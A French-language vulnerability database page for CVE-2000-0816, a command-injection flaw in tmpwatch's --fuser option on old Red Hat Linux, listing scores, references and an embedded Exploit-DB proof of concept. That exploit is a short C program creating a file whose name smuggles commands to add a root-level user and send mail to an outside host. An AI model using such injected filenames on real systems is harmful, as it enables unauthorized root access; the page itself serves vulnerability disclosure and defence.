CVE-2000-0816 : Détail

CVE-2000-0816

0.04%V3
Local
2001-05-07
02h00 +00:00
2004-09-02
07h00 +00:00
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Linux tmpwatch --fuser option allows local users to execute arbitrary commands by creating files whose names contain shell metacharacters.

Informations du CVE

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

Informations sur l'Exploit

Exploit Database EDB-ID : 20285

Date de publication : 2000-10-05 22h00 +00:00
Auteur : X-Force
EDB Vérifié : Yes

// source: https://www.securityfocus.com/bid/1785/info A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges. #include <stdio.h> int main() { FILE *f; char filename[100] = ";useradd -u 0 -g 0 haks0r;mail haks0r@somehost.com<blablabla"; if((f = fopen(filename, "a")) == 0) { perror("Could not create file"); exit(1); } close(f); }

Products Mentioned

Configuraton 0

Redhat>>Linux >> Version 6.2

    Redhat>>Linux >> Version 6.2

      Redhat>>Linux >> Version 6.2

        Redhat>>Linux >> Version 7.0

        Références

        http://www.redhat.com/support/errata/RHSA-2000-080.html
        Tags : vendor-advisory, x_refsource_REDHAT
        http://xforce.iss.net/alerts/advise64.php
        Tags : third-party-advisory, x_refsource_ISS
        http://www.securityfocus.com/bid/1785
        Tags : vdb-entry, x_refsource_BID